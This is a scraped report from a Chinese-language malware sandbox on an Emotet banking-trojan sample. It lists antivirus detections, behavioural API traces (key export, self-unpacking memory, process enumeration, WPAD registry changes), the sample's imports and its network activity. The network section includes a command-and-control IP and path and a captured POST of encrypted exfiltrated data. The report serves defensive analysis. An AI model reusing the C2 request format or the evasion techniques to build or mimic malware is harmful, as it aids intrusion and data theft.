SmartHawk

7.4

高危

57 个模型检测该样本为恶意！

重新分析

下载样本

4be43a1670bda2ac6c0727386de1416f0c0f61f7e5a6ca4af88ec6514cfe6347

e89678884a233c298bc9339dbd2d88d1.exe

分析耗时

81s

最近分析

文件大小

344.0KB

静态报毒动态报毒 100% AI SCORE=100 CONFIDENCE CRYPTERX DNKSR DOWNLOADER34 ELDORADO EMOTET EWBA GENETIC HFZB HIGH CONFIDENCE HUCXWI KCLOUD KRYPTIK MALWARE@#39BEWG3R41C9J OBFUSE QRYOC0YXLYU R + TROJ R350346 SCORE SMD4 SUSGEN THJABBO TROJANBANKER TRUG UNSAFE 更多

未检测暂无鹰眼引擎检测结果

查杀引擎	查杀结果	查杀时间	查杀版本
Alibaba	Trojan:Win32/Emotet.2dfa3b0a	20190527	0.3.0.5
Baidu		20190318	1.0.0.2
Avast	Win32:CrypterX-gen [Trj]	20210218	21.1.5827.0
Kingsoft	Win32.Troj.Banker.(kcloud)	20210218	2017.9.26.565
McAfee	Emotet-FSD!E89678884A23	20210218	6.0.6.653
CrowdStrike	win/malicious_confidence_100% (W)	20210203	1.0

Queries for the computername (1 个事件)

Time & API	Arguments	Status	Return	Repeated
1620830071.1365 GetComputerNameA	computer_name: OSKAR-PC	success	1	0

Uses Windows APIs to generate a cryptographic key (5 个事件)

Time & API	Arguments	Status	Return
1620830060.8555 CryptGenKey	crypto_handle: 0x00344fb8 algorithm_identifier: 0x0000660e () provider_handle: 0x00344928 flags: 1 key: fskõ1(¾¾âä©ö%OdéÂ	success	1
1620830071.1685 CryptExportKey	crypto_handle: 0x00344fb8 crypto_export_handle: 0x00344f78 buffer: f¤-eæi6Ò:2ñKÜý`»YÁÕPuû«jýMrÖ/9å·ÙpíÕÂmsèr#g½NqvÄgÐePì!?}åÆÈbys:"×5<È+Ï¸~ô blob_type: 1 flags: 64	success	1
1620830108.5745 CryptExportKey	crypto_handle: 0x00344fb8 crypto_export_handle: 0x00344f78 buffer: f¤÷kZ¡/V-$¾»vòóûè¼øÛÜ0µoóÛ¨º°=&>ý5¹OSÖ%kÝLR7Ýà» qª~v;Í#T³uA¬@Hÿ-H¹»H\|ãdgÁ²ý\^ blob_type: 1 flags: 64	success	1
1620830112.8865 CryptExportKey	crypto_handle: 0x00344fb8 crypto_export_handle: 0x00344f78 buffer: f¤@~øpFuó¬h.£®1"º)jSpºé}à&îZÎÁm®ÈYì {'4æ 4pfXyg YäE7r¬'"¤ï©;ëý@ blob_type: 1 flags: 64	success	1
1620830118.2775 CryptExportKey	crypto_handle: 0x00344fb8 crypto_export_handle: 0x00344f78 buffer: f¤åã+ºn;F@Ñ7þ@×§9ÀÁÂ:}+´\|Öd©»~©¥"/ñÙµ¸ÔDa,øùÝ$ËrQHegèkX%[DLP%× gBörÁä*5¦Ý¸dëT¥ blob_type: 1 flags: 64	success	1

The file contains an unknown PE resource name possibly indicative of a packer (1 个事件)

resource name

None

Allocates read-write-execute memory (usually to unpack itself) (1 个事件)

Time & API	Arguments	Status	Return	Repeated
1620830059.9805 NtAllocateVirtualMemory	process_identifier: 2988 region_size: 45056 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) base_address: 0x01e50000	success	0	0

Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (2 个事件)

Time & API	Arguments	Status	Return	Repeated
1620830118.2775 Process32NextW	process_name: inject-x86.exe snapshot_handle: 0x000003c0 process_identifier: 2516	success	1	0
1620830118.2775 Process32NextW	process_name: mscorsvw.exe snapshot_handle: 0x000003c0 process_identifier: 1244	success	1	0

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 个事件)

Time & API	Arguments	Status	Return	Repeated
1620830059.9965 NtProtectVirtualMemory	process_identifier: 2988 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 28672 protection: 32 (PAGE_EXECUTE_READ) process_handle: 0xffffffff base_address: 0x01f71000	success	0	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 个事件)

Time & API	Arguments	Status	Return	Repeated
1620830072.5585 GetAdaptersAddresses	flags: 0 family: 0	failed	111	0

The binary likely contains encrypted or compressed data indicative of a packer (1 个事件)

entropy

7.016649021766093

section

{'size_of_data': '0x00011000', 'virtual_address': '0x00049000', 'entropy': 7.016649021766093, 'name': '.rsrc', 'virtual_size': '0x000101e8'}

description

A section with a high entropy has been found

Expresses interest in specific running processes (1 个事件)

process

e89678884a233c298bc9339dbd2d88d1.exe

Reads the systems User Agent and subsequently performs requests (1 个事件)

Time & API	Arguments	Status	Return	Repeated
1620830071.6215 InternetOpenW	proxy_bypass: access_type: 0 proxy_name: flags: 0 user_agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)	success	13369348	0

Communicates with host for which no DNS query was performed (7 个事件)

host	142.44.137.67
host	162.241.242.173
host	172.217.24.14
host	192.158.216.73
host	85.214.28.226
host	203.208.40.66
host	203.208.41.65

Sets or modifies WPAD proxy autoconfiguration file for traffic interception (8 个事件)

Time & API	Arguments	Status
1620830075.2615 RegSetValueExA	key_handle: 0x000003c0 value: 1 regkey_r: WpadDecisionReason reg_type: 4 (REG_DWORD) regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionReason	success
1620830075.2615 RegSetValueExA	key_handle: 0x000003c0 value: àÈAG× regkey_r: WpadDecisionTime reg_type: 3 (REG_BINARY) regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionTime	success
1620830075.2615 RegSetValueExA	key_handle: 0x000003c0 value: 3 regkey_r: WpadDecision reg_type: 4 (REG_DWORD) regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecision	success
1620830075.2615 RegSetValueExW	key_handle: 0x000003c0 value: 网络 2 regkey_r: WpadNetworkName reg_type: 1 (REG_SZ) regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadNetworkName	success
1620830075.2775 RegSetValueExA	key_handle: 0x000003d8 value: 1 regkey_r: WpadDecisionReason reg_type: 4 (REG_DWORD) regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionReason	success
1620830075.2775 RegSetValueExA	key_handle: 0x000003d8 value: àÈAG× regkey_r: WpadDecisionTime reg_type: 3 (REG_BINARY) regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionTime	success
1620830075.2775 RegSetValueExA	key_handle: 0x000003d8 value: 3 regkey_r: WpadDecision reg_type: 4 (REG_DWORD) regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecision	success
1620830075.4185 RegSetValueExW	key_handle: 0x000003bc value: {40112ABE-63B3-43C3-BE93-1440EE3AF106} regkey_r: WpadLastNetwork reg_type: 1 (REG_SZ) regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadLastNetwork	success

File has been identified by 57 AntiVirus engines on VirusTotal as malicious (50 out of 57 个事件)

Elastic	malicious (high confidence)
MicroWorld-eScan	Trojan.Agent.EWBA
FireEye	Generic.mg.e89678884a233c29
Qihoo-360	Win32/Trojan.bd3
ALYac	Trojan.Agent.Emotet
Cylance	Unsafe
Zillya	Trojan.Emotet.Win32.28389
Sangfor	Trojan.Win32.Emotet.ARK
K7AntiVirus	Trojan ( 0056de091 )
Alibaba	Trojan:Win32/Emotet.2dfa3b0a
K7GW	Trojan ( 0056de091 )
Cybereason	malicious.84a233
Arcabit	Trojan.Agent.EWBA
Cyren	W32/Kryptik.BWJ.gen!Eldorado
Symantec	Packed.Generic.554
APEX	Malicious
Avast	Win32:CrypterX-gen [Trj]
ClamAV	Win.Malware.Emotet-9753021-0
Kaspersky	HEUR:Trojan-Banker.Win32.Emotet.vho
BitDefender	Trojan.Agent.EWBA
NANO-Antivirus	Trojan.Win32.Emotet.hucxwi
Paloalto	generic.ml
AegisLab	Trojan.Win32.Emotet.trug
Ad-Aware	Trojan.Agent.EWBA
TACHYON	Banker/W32.Emotet.352256.H
Emsisoft	Trojan.Emotet (A)
Comodo	Malware@#39bewg3r41c9j
F-Secure	Trojan.TR/Crypt.Agent.dnksr
DrWeb	Trojan.DownLoader34.32723
VIPRE	Trojan.Win32.Generic!BT
TrendMicro	TrojanSpy.Win32.EMOTET.THJABBO
McAfee-GW-Edition	BehavesLike.Win32.Emotet.fh
Sophos	Mal/Generic-R + Troj/Emotet-CLZ
Ikarus	Trojan-Banker.Emotet
Jiangmin	Trojan.Banker.Emotet.oif
Avira	TR/Crypt.Agent.dnksr
Antiy-AVL	Trojan[Banker]/Win32.Emotet
Kingsoft	Win32.Troj.Banker.(kcloud)
Gridinsoft	Trojan.Win32.Emotet.oa
Microsoft	Trojan:Win32/Emotet.ARK!MTB
ZoneAlarm	HEUR:Trojan-Banker.Win32.Emotet.vho
GData	Trojan.Agent.EWBA
Cynet	Malicious (score: 100)
AhnLab-V3	Trojan/Win32.Emotet.R350346
McAfee	Emotet-FSD!E89678884A23
MAX	malware (ai score=100)
VBA32	TrojanBanker.Emotet
Malwarebytes	Trojan.Agent
ESET-NOD32	a variant of Win32/Kryptik.HFZB
TrendMicro-HouseCall	TrojanSpy.Win32.EMOTET.SMD4.hp

Connects to IP addresses that are no longer responding to requests (legitimate services will remain up-and-running usually) (4 个事件)

dead_host	192.158.216.73:80
dead_host	192.168.56.101:49200
dead_host	85.214.28.226:8080
dead_host	192.168.56.101:49182

暂无二进制图像该样本未生成二进制可视化图像

暂无运行截图该样本运行过程中未生成截图

👋 欢迎使用 ChatHawk

我是您的恶意软件分析助手，可以帮您分析和解读恶意软件报告。请随时向我提问！

🔍 主要威胁分析

⚡ 行为特征

🛡️ 防护建议

🔧 技术手段

🎯 检测方法

🤖

Static Analysis
Strings

PE Compile Time

2020-09-05 01:07:32

Imports

Library KERNEL32.dll:

• 0x4340b4 GetFileTime

• 0x4340b8 GetTickCount

• 0x4340bc HeapFree

• 0x4340c0 RtlUnwind

• 0x4340c4 VirtualProtect

• 0x4340c8 VirtualAlloc

• 0x4340cc GetSystemInfo

• 0x4340d0 VirtualQuery

• 0x4340d4 HeapAlloc

• 0x4340d8 HeapReAlloc

• 0x4340dc GetCommandLineA

• 0x4340e0 GetProcessHeap

• 0x4340e4 GetStartupInfoA

• 0x4340e8 RaiseException

• 0x4340ec ExitProcess

• 0x4340f0 HeapSize

• 0x4340f4 HeapDestroy

• 0x4340f8 HeapCreate

• 0x4340fc VirtualFree

• 0x434100 TerminateProcess

• 0x434104 UnhandledExceptionFilter

• 0x434108 SetUnhandledExceptionFilter

• 0x43410c IsDebuggerPresent

• 0x434110 GetACP

• 0x434114 LCMapStringA

• 0x434118 GetFileAttributesA

• 0x43411c GetStdHandle

• 0x434120 Sleep

• 0x434124 FreeEnvironmentStringsA

• 0x434128 GetEnvironmentStrings

• 0x43412c FreeEnvironmentStringsW

• 0x434130 GetEnvironmentStringsW

• 0x434134 SetHandleCount

• 0x434138 GetFileType

• 0x43413c QueryPerformanceCounter

• 0x434140 GetSystemTimeAsFileTime

• 0x434144 GetStringTypeA

• 0x434148 GetStringTypeW

• 0x43414c GetTimeZoneInformation

• 0x434150 GetConsoleCP

• 0x434154 GetConsoleMode

• 0x434158 SetStdHandle

• 0x43415c WriteConsoleA

• 0x434160 GetConsoleOutputCP

• 0x434164 WriteConsoleW

• 0x434168 SetEnvironmentVariableA

• 0x43416c FileTimeToLocalFileTime

• 0x434170 SetErrorMode

• 0x434174 FileTimeToSystemTime

• 0x434178 GetOEMCP

• 0x43417c GetCPInfo

• 0x434180 CreateFileA

• 0x434184 GetFullPathNameA

• 0x434188 GetVolumeInformationA

• 0x43418c FindFirstFileA

• 0x434190 FindClose

• 0x434194 GetCurrentProcess

• 0x434198 DuplicateHandle

• 0x43419c GetThreadLocale

• 0x4341a0 GetFileSize

• 0x4341a4 SetEndOfFile

• 0x4341a8 UnlockFile

• 0x4341ac LockFile

• 0x4341b0 FlushFileBuffers

• 0x4341b4 SetFilePointer

• 0x4341b8 WriteFile

• 0x4341bc ReadFile

• 0x4341c0 GlobalFlags

• 0x4341c4 TlsFree

• 0x4341c8 DeleteCriticalSection

• 0x4341cc LocalReAlloc

• 0x4341d0 TlsSetValue

• 0x4341d4 TlsAlloc

• 0x4341d8 InitializeCriticalSection

• 0x4341dc GlobalHandle

• 0x4341e0 GlobalReAlloc

• 0x4341e4 EnterCriticalSection

• 0x4341e8 TlsGetValue

• 0x4341ec LeaveCriticalSection

• 0x4341f0 LocalAlloc

• 0x4341f4 InterlockedIncrement

• 0x4341f8 InterlockedDecrement

• 0x4341fc GetModuleFileNameW

• 0x434200 GlobalGetAtomNameA

• 0x434204 GlobalFindAtomA

• 0x434208 lstrcmpW

• 0x43420c GetVersionExA

• 0x434210 WritePrivateProfileStringA

• 0x434214 FreeResource

• 0x434218 GetCurrentProcessId

• 0x43421c GlobalAddAtomA

• 0x434220 CloseHandle

• 0x434224 GetCurrentThread

• 0x434228 GetCurrentThreadId

• 0x43422c ConvertDefaultLocale

• 0x434230 GetModuleFileNameA

• 0x434234 EnumResourceLanguagesA

• 0x434238 GetLocaleInfoA

• 0x43423c LoadLibraryA

• 0x434240 lstrcmpA

• 0x434244 FreeLibrary

• 0x434248 GlobalDeleteAtom

• 0x43424c GetModuleHandleA

• 0x434250 SetLastError

• 0x434254 GlobalFree

• 0x434258 GlobalAlloc

• 0x43425c GlobalLock

• 0x434260 GlobalUnlock

• 0x434264 FormatMessageA

• 0x434268 LocalFree

• 0x43426c MulDiv

• 0x434270 LoadResource

• 0x434274 LockResource

• 0x434278 SizeofResource

• 0x43427c FindResourceA

• 0x434280 LoadLibraryW

• 0x434284 GetProcAddress

• 0x434288 GetLastError

• 0x43428c lstrlenA

• 0x434290 WideCharToMultiByte

• 0x434294 CompareStringA

• 0x434298 CompareStringW

• 0x43429c MultiByteToWideChar

• 0x4342a0 GetVersion

• 0x4342a4 LCMapStringW

• 0x4342a8 InterlockedExchange

Library USER32.dll:

• 0x4342fc UnregisterClassA

• 0x434300 RegisterClipboardFormatA

• 0x434304 PostThreadMessageA

• 0x434308 ReleaseCapture

• 0x43430c SetCapture

• 0x434310 LoadCursorA

• 0x434314 GetSysColorBrush

• 0x434318 EndPaint

• 0x43431c BeginPaint

• 0x434320 GetWindowDC

• 0x434324 ReleaseDC

• 0x434328 GetDC

• 0x43432c ClientToScreen

• 0x434330 GrayStringA

• 0x434334 DrawTextExA

• 0x434338 DrawTextA

• 0x43433c TabbedTextOutA

• 0x434340 DestroyMenu

• 0x434344 ShowWindow

• 0x434348 MoveWindow

• 0x43434c SetWindowTextA

• 0x434350 IsDialogMessageA

• 0x434354 RegisterWindowMessageA

• 0x434358 SendDlgItemMessageA

• 0x43435c WinHelpA

• 0x434360 IsChild

• 0x434364 GetCapture

• 0x434368 GetClassLongA

• 0x43436c SetPropA

• 0x434370 GetPropA

• 0x434374 RemovePropA

• 0x434378 SetFocus

• 0x43437c GetWindowTextLengthA

• 0x434380 GetWindowTextA

• 0x434384 MessageBeep

• 0x434388 GetTopWindow

• 0x43438c UnhookWindowsHookEx

• 0x434390 GetMessageTime

• 0x434394 GetMessagePos

• 0x434398 MapWindowPoints

• 0x43439c SetForegroundWindow

• 0x4343a0 UpdateWindow

• 0x4343a4 GetMenu

• 0x4343a8 CreateWindowExA

• 0x4343ac GetClassInfoExA

• 0x4343b0 GetClassInfoA

• 0x4343b4 RegisterClassA

• 0x4343b8 GetSysColor

• 0x4343bc AdjustWindowRectEx

• 0x4343c0 EqualRect

• 0x4343c4 CopyRect

• 0x4343c8 PtInRect

• 0x4343cc GetDlgCtrlID

• 0x4343d0 DefWindowProcA

• 0x4343d4 CallWindowProcA

• 0x4343d8 SetWindowLongA

• 0x4343dc OffsetRect

• 0x4343e0 IntersectRect

• 0x4343e4 SystemParametersInfoA

• 0x4343e8 GetWindowPlacement

• 0x4343ec GetWindowRect

• 0x4343f0 GetWindow

• 0x4343f4 SetWindowContextHelpId

• 0x4343f8 MapDialogRect

• 0x4343fc SetWindowPos

• 0x434400 GetDesktopWindow

• 0x434404 CharUpperA

• 0x434408 EnableWindow

• 0x43440c LoadIconA

• 0x434410 SetActiveWindow

• 0x434414 CreateDialogIndirectParamA

• 0x434418 DestroyWindow

• 0x43441c IsWindow

• 0x434420 GetDlgItem

• 0x434424 GetNextDlgTabItem

• 0x434428 EndDialog

• 0x43442c GetWindowThreadProcessId

• 0x434430 GetWindowLongA

• 0x434434 GetLastActivePopup

• 0x434438 IsWindowEnabled

• 0x43443c MessageBoxA

• 0x434440 GetNextDlgGroupItem

• 0x434444 InvalidateRgn

• 0x434448 InvalidateRect

• 0x43444c SetRect

• 0x434450 IsRectEmpty

• 0x434454 SetCursor

• 0x434458 SetWindowsHookExA

• 0x43445c CopyAcceleratorTableA

• 0x434460 CharNextA

• 0x434464 GetForegroundWindow

• 0x434468 SendMessageA

• 0x43446c AppendMenuA

• 0x434470 GetSystemMenu

• 0x434474 DrawIcon

• 0x434478 GetClientRect

• 0x43447c GetSystemMetrics

• 0x434480 IsIconic

• 0x434484 GetSubMenu

• 0x434488 GetMenuItemCount

• 0x43448c GetMenuItemID

• 0x434490 GetMenuState

• 0x434494 PostQuitMessage

• 0x434498 PostMessageA

• 0x43449c CheckMenuItem

• 0x4344a0 EnableMenuItem

• 0x4344a4 ModifyMenuA

• 0x4344a8 GetParent

• 0x4344ac GetFocus

• 0x4344b0 LoadBitmapA

• 0x4344b4 GetMenuCheckMarkDimensions

• 0x4344b8 SetMenuItemBitmaps

• 0x4344bc ValidateRect

• 0x4344c0 GetCursorPos

• 0x4344c4 PeekMessageA

• 0x4344c8 GetKeyState

• 0x4344cc IsWindowVisible

• 0x4344d0 GetActiveWindow

• 0x4344d4 DispatchMessageA

• 0x4344d8 TranslateMessage

• 0x4344dc GetMessageA

• 0x4344e0 CallNextHookEx

• 0x4344e4 GetClassNameA

Library GDI32.dll:

• 0x434030 ScaleWindowExtEx

• 0x434034 ExtSelectClipRgn

• 0x434038 DeleteDC

• 0x43403c GetStockObject

• 0x434040 SetWindowExtEx

• 0x434044 GetBkColor

• 0x434048 GetTextColor

• 0x43404c CreateRectRgnIndirect

• 0x434050 GetRgnBox

• 0x434054 GetMapMode

• 0x434058 ScaleViewportExtEx

• 0x43405c SetViewportExtEx

• 0x434060 OffsetViewportOrgEx

• 0x434064 SetViewportOrgEx

• 0x434068 SelectObject

• 0x43406c Escape

• 0x434070 TextOutA

• 0x434074 RectVisible

• 0x434078 PtVisible

• 0x43407c GetDeviceCaps

• 0x434080 GetViewportExtEx

• 0x434084 DeleteObject

• 0x434088 SetMapMode

• 0x43408c RestoreDC

• 0x434090 SaveDC

• 0x434094 ExtTextOutA

• 0x434098 GetObjectA

• 0x43409c SetBkColor

• 0x4340a0 SetTextColor

• 0x4340a4 GetClipBox

• 0x4340a8 CreateBitmap

• 0x4340ac GetWindowExtEx

Library comdlg32.dll:

• 0x4344fc GetFileTitleA

Library WINSPOOL.DRV:

• 0x4344ec DocumentPropertiesA

• 0x4344f0 OpenPrinterA

• 0x4344f4 ClosePrinter

Library ADVAPI32.dll:

• 0x434000 RegOpenKeyExA

• 0x434004 RegQueryValueA

• 0x434008 RegEnumKeyA

• 0x43400c RegDeleteKeyA

• 0x434010 RegCloseKey

• 0x434014 RegOpenKeyA

• 0x434018 RegSetValueExA

• 0x43401c RegCreateKeyExA

• 0x434020 RegQueryValueExA

Library COMCTL32.dll:

• 0x434028

Library SHLWAPI.dll:

• 0x4342e8 PathFindFileNameA

• 0x4342ec PathStripToRootA

• 0x4342f0 PathFindExtensionA

• 0x4342f4 PathIsUNCA

Library oledlg.dll:

• 0x434544

Library ole32.dll:

• 0x434504 OleInitialize

• 0x434508 CoFreeUnusedLibraries

• 0x43450c OleUninitialize

• 0x434510 CreateILockBytesOnHGlobal

• 0x434514 StgCreateDocfileOnILockBytes

• 0x434518 StgOpenStorageOnILockBytes

• 0x43451c CoGetClassObject

• 0x434520 CLSIDFromString

• 0x434524 CoRevokeClassObject

• 0x434528 CoTaskMemAlloc

• 0x43452c CoTaskMemFree

• 0x434530 OleIsCurrentClipboard

• 0x434534 OleFlushClipboard

• 0x434538 CoRegisterMessageFilter

• 0x43453c CLSIDFromProgID

Library OLEAUT32.dll:

• 0x4342b0 SysAllocStringLen

• 0x4342b4 VariantClear

• 0x4342b8 VariantChangeType

• 0x4342bc VariantInit

• 0x4342c0 SysStringLen

• 0x4342c4 SysAllocStringByteLen

• 0x4342c8 OleCreateFontIndirect

• 0x4342cc VariantTimeToSystemTime

• 0x4342d0 SystemTimeToVariantTime

• 0x4342d4 SafeArrayDestroy

• 0x4342d8 SysAllocString

• 0x4342dc VariantCopy

• 0x4342e0 SysFreeString

Exports

Ordinal	Address	Name
1	0x401b20	UUACZDADWAJJJJJ

Hosts

No hosts contacted.

DNS

Name	Response	Post-Analysis Lookup
time.windows.com	A 20.189.79.72 CNAME time.microsoft.akadns.net
dns.msftncsi.com	AAAA fd3e:4f5a:5b81::1	131.107.255.255
dns.msftncsi.com	A 131.107.255.255	131.107.255.255
teredo.ipv6.microsoft.com

TCP

Source	Source Port	Destination	Destination Port
192.168.56.101	49185	142.44.137.67	443

UDP

Source	Source Port	Destination	Destination Port
192.168.56.101	50002	114.114.114.114	53
192.168.56.101	51378	114.114.114.114	53
192.168.56.101	57756	114.114.114.114	53
192.168.56.101	62318	114.114.114.114	53
192.168.56.101	65004	114.114.114.114	53
192.168.56.101	137	192.168.56.255	137
192.168.56.101	138	192.168.56.255	138
192.168.56.101	123	20.189.79.72 time.windows.com	123
192.168.56.101	49235	224.0.0.252	5355
192.168.56.101	51963	224.0.0.252	5355
192.168.56.101	53237	224.0.0.252	5355
192.168.56.101	53657	224.0.0.252	5355
192.168.56.101	56804	224.0.0.252	5355
192.168.56.101	58367	224.0.0.252	5355
192.168.56.101	60384	224.0.0.252	5355
192.168.56.101	62191	224.0.0.252	5355
192.168.56.101	63429	224.0.0.252	5355
192.168.56.101	1900	239.255.255.250	1900
192.168.56.101	50003	239.255.255.250	3702
192.168.56.101	53238	239.255.255.250	3702

HTTP & HTTPS Requests

URI	Data
http://142.44.137.67:443/sFSp9a4DLJtQnU/	POST /sFSp9a4DLJtQnU/ HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------ee3zQ4bGK0M3GHsSBL User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 142.44.137.67:443 Content-Length: 4500 Connection: Keep-Alive Cache-Control: no-cache
http://142.44.137.67:443/sFSp9a4DLJtQnU/	POST /sFSp9a4DLJtQnU/ HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------ee3zQ4bGK0M3GHsSBL User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 142.44.137.67:443 Content-Length: 4500 Connection: Keep-Alive Cache-Control: no-cache --------------------ee3zQ4bGK0M3GHsSBL Content-Disposition: form-data; name="xegpocrwamluq"; filename="fiokvdjyczv" Content-Type: application/octet-stream @\xfd\xeb\x07\x08;\xa9\x08\x0c\x85\xef\xa4"'\xacr7E\xe4\x1a\x12Y g\x0byXf\x94p4\x1b \x9c\x8f\xe64'{ \x88\xec\x89Y\xc8\x92\x15\xaem\xc1\xce\x9fZ\xee&\x19\xe0\x81\x01}\x0b\x10\xe9\xba\x90p\x86\x13Sj)\x06\xba"1\x1e\xae\xa3\x00\xad\x9c.\x96h\xac\xf3uFp\x05\xf8~\x0b\x8b\x9c@\xbc;?n\x94\xd4\xf6~{G0\xd8\xc1\xe2\x90\x0c6\x9f8;zw\xa0v\xdaD<O7\xfe\xf5X1"\xadA\xa1\xa1\xee6mi\x94\x18\x02\x11;\x7f\x19\xeb\x06\xeb)\|"\x81k\xeb\B\xb4\x93\xcd\xb5\xde8+<\|\xcb\x8c\x85\x02\x91\xcd\|\xf4J\xb5\x15\x9aEi\xee[o\xf2\xda\xd3\x1a\xa4 \x1d\x18\x90\x90\xf36sZ\x17\xa5Kw\x1c4\xbd\xdf\x1b} \xbe\x17\x05\xa2\x08\xb3\xfd\x86 \xbd)\x8a\xa3\x95&\x158_\x8e\xdc7\xfbw\x87X\xf0rS\xb71\xca\xa7\x0b\xb2\x90\xd7\xcf\x9a\xdd\xf8\x95l\x14\x11_\x92\x05\x8c\x97\xfc\xe6\x1b\xf7\x86\x81\xdf\xe5g\xa6\x87om\xd4\xa9!\x85tF\xd3\x1d\x81\x8e\xbdO\xae\x93\x15dI3\xa5\xdcdu\xd5YEd"\x80\x93\x9d(\xad\x07@\x94\xcf\xc7\xad\x1e\x89^\xc9\xbe\x99\xc5O\xef\x7f:\xccGU\xefy\x7f\x19\x95\x1f>Yl&\x8c\xd0\xc7\xbb\x19\xfek\xf1V\xcbd\x97\x11\x94\xbb\xe1\xa10=\xf7\x97\xfc4\x96\xd41\xcfj\x04\x1cf\xcc\xe8f\xa4\xe52\x8e\xee\x13\xa2\xd1\xf5\x827$m\xac\xaf\xb5\x01\x00A/\x1f\x80\xba\xe4\xe7\x8b\xa4\xde\x06/{\x19;\xb0s\xa1\xe8 --------------------ee3zQ4bGK0M3GHsSBL--\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00

URI

Data

http://142.44.137.67:443/sFSp9a4DLJtQnU/

POST /sFSp9a4DLJtQnU/ HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------ee3zQ4bGK0M3GHsSBL
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 142.44.137.67:443
Content-Length: 4500
Connection: Keep-Alive
Cache-Control: no-cache

http://142.44.137.67:443/sFSp9a4DLJtQnU/

POST /sFSp9a4DLJtQnU/ HTTP/1.1
